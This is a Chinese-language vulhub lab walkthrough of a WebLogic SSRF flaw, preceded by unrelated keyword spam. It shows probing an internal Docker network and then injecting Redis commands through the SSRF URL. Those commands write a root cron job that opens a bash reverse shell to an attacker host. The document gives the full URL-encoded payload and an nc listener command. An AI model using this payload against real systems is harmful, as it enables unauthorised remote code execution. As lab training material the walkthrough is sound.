网站建设销售人才简历,做网站的公司排行,网站开发 佛山,电脑网页打不开怎么解决文章目录 漏洞测试注入HTTP头#xff0c;利用Redis反弹shell redis不能启动问题解决 Path : vulhub/weblogic/ssrf 编译及启动测试环境
docker compose up -dWeblogic中存在一个SSRF漏洞#xff0c;利用该漏洞可以发送任意HTTP请求#xff0c;进而攻击内网中redis、fastcgi… 文章目录 漏洞测试注入HTTP头利用Redis反弹shell redis不能启动问题解决 Path : vulhub/weblogic/ssrf 编译及启动测试环境
docker compose up -dWeblogic中存在一个SSRF漏洞利用该漏洞可以发送任意HTTP请求进而攻击内网中redis、fastcgi等脆弱组件
访问http://127.0.0.1:7001/uddiexplorer/无需登录即可查看uddiexplorer应用 点击Search Public Registries 来到http://127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp页面 漏洞测试
打开BurpSuite测试点击Search按钮
Ctrlr发送到Repeater模块观察数据包 根据数据包的响应信息可以猜测operator参数后面可以跟一个url地址
利用dnslog平台测试生成一个域名 成功解析到说明operator后面 可以做url地址请求说明存在SSRF 漏洞 访问一个可以访问的IP:PORT如http://127.0.0.1:80 发现80端口没有开放
在访问7001端口 通过错误的不同即可探测内网状态。
环境是在docker上启动的docker环境的网段一般是172.* 注入HTTP头利用Redis反弹shell
发送三条redis命令将弹shell脚本写入/etc/crontab
反弹到kali上
set 1 \n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c sh -i /dev/tcp/192.168.80.141/21 01\n\n\n\n
config set dir /etc/
config set dbfilename crontab
save进行url编码
set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave注意换行符是“\r\n”也就是“%0D%0A”。
将url编码后的字符串放在ssrf的域名后面发送
http://172.19.0.2:6379/saury%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.80.141%2F21%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Asaurykali开启监听
nc -lvvp 21bp发送请求 等待计划任务生效 成功拿到shell
redis不能启动问题解决
在使用sudo docker-compose up -d启动环境的时候只启动了weblogic没有启动redis 修改如下配置
vim /etc/default/grub
GRUB_CMDLINE_LINUX_DEFAULTvsyscallemulate:wq保存后命令行运行update-grub reboot重启redis成功启动 解决方法来自:https://blog.csdn.net/weixin_43886198/article/details/111144854
